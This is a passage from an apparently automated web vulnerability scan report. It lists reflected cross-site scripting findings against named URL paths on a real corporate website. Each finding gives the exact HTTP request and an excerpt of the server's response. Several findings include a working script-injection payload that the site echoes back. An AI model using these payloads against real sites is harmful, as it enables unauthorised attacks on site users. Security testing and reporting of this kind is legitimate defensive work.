var request='/resourcesdaffc';a2458a8f6e2/1002a3a14-111-Solutions+Briefs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.719. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb11e'%3b896f26dea4d was submitted in the REST URL parameter 2. This input was echoed as bb11e';896f26dea4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/bb11e'%3b896f26dea4d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/bb11e';896f26dea4d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.720. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a14-111-Solutions+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 684bd</script><script>alert(1)</script>7a12bc5c372 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a14-111-Solutions+Briefs.xml684bd</script><script>alert(1)</script>7a12bc5c372 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fa3f273a4d5ce69f959280bf5b00b9ea"
Last-Modified: Wed, 17 Nov 2010 00:30:21 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 65013
Date: Wed, 17 Nov 2010 00:30:21 GMT
Connection: close
Set-Cookie: BERT=VRID%3daa37653f-035e-4536-9d81-6c062831a468|VTID%3dabbe9794-f8e0-40c6-ae3e-00ded104e035|SX%3d1289955020|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:04 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a3a14-111-Solutions+Briefs.xml684bd</script><script>alert(1)</script>7a12bc5c372</url>
...[SNIP]...

1.721. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e9d"%3b8b89e67dee was submitted in the REST URL parameter 1. This input was echoed as 38e9d";8b89e67dee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources38e9d"%3b8b89e67dee/1002a3a2-111-Analyst+Reports.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources38e9d";8b89e67dee/1002a3a2-111-Analyst+Reports.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.722. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813e0'%3bb111eba958e was submitted in the REST URL parameter 1. This input was echoed as 813e0';b111eba958e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources813e0'%3bb111eba958e/1002a3a2-111-Analyst+Reports.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:28:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources813e0';b111eba958e/1002a3a2-111-Analyst+Reports.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.723. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b131d'%3b73ce3cd9ce9 was submitted in the REST URL parameter 2. This input was echoed as b131d';73ce3cd9ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b131d'%3b73ce3cd9ce9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b131d';73ce3cd9ce9'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.724. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a2-111-Analyst+Reports.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce4fa</script><script>alert(1)</script>6ebf93f296 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a2-111-Analyst+Reports.xmlce4fa</script><script>alert(1)</script>6ebf93f296 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "3c664867a30a1490a48862f46aac769b"
Last-Modified: Wed, 17 Nov 2010 00:29:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:32 GMT
Content-Length: 29608
Connection: close
Set-Cookie: BERT=VRID%3de2e355ac-d9d5-47f7-80ec-d909da45b3f0|VTID%3d67c67cb9-2135-445c-a2b5-26fff1f634d9|SX%3d1289954971|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:15 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a3a2-111-Analyst+Reports.xmlce4fa</script><script>alert(1)</script>6ebf93f296</url>
...[SNIP]...

1.725. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a68"%3b7245cbcc16e was submitted in the REST URL parameter 1. This input was echoed as 36a68";7245cbcc16e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources36a68"%3b7245cbcc16e/1002a3a3-111-Case+Studies.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:03 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources36a68";7245cbcc16e/1002a3a3-111-Case+Studies.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.726. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 805aa'%3b10bb9b1c4d0 was submitted in the REST URL parameter 1. This input was echoed as 805aa';10bb9b1c4d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources805aa'%3b10bb9b1c4d0/1002a3a3-111-Case+Studies.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources805aa';10bb9b1c4d0/1002a3a3-111-Case+Studies.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.727. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc13</script><script>alert(1)</script>48631b249a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a3-111-Case+Studies.xmldcc13</script><script>alert(1)</script>48631b249a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d693d99caceb442bb9266196ae61ed09"
Last-Modified: Wed, 17 Nov 2010 00:19:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:19:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d58d23b65-aae0-4b7b-975e-72481d960674|VTID%3d2365ccbd-2173-46d6-8803-9e49469deee9|SX%3d1289954352|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:22:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:19:13 GMT
Content-Length: 63261

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a3a3-111-Case+Studies.xmldcc13</script><script>alert(1)</script>48631b249a7</url>
...[SNIP]...

1.728. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a3-111-Case+Studies.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f77'%3be4bcc915404 was submitted in the REST URL parameter 2. This input was echoed as 29f77';e4bcc915404 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/29f77'%3be4bcc915404 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/29f77';e4bcc915404'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.729. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc83"%3bded5cf3ccaf was submitted in the REST URL parameter 1. This input was echoed as 8dc83";ded5cf3ccaf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8dc83"%3bded5cf3ccaf/1002a3a4-111-Executive+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:38 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8dc83";ded5cf3ccaf/1002a3a4-111-Executive+Briefs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.730. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e9e5'%3b10c5f26ad12 was submitted in the REST URL parameter 1. This input was echoed as 8e9e5';10c5f26ad12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8e9e5'%3b10c5f26ad12/1002a3a4-111-Executive+Briefs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:55 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources8e9e5';10c5f26ad12/1002a3a4-111-Executive+Briefs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.731. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a4-111-Executive+Briefs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e67e3'%3bcdf496f0cea was submitted in the REST URL parameter 2. This input was echoed as e67e3';cdf496f0cea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e67e3'%3bcdf496f0cea HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
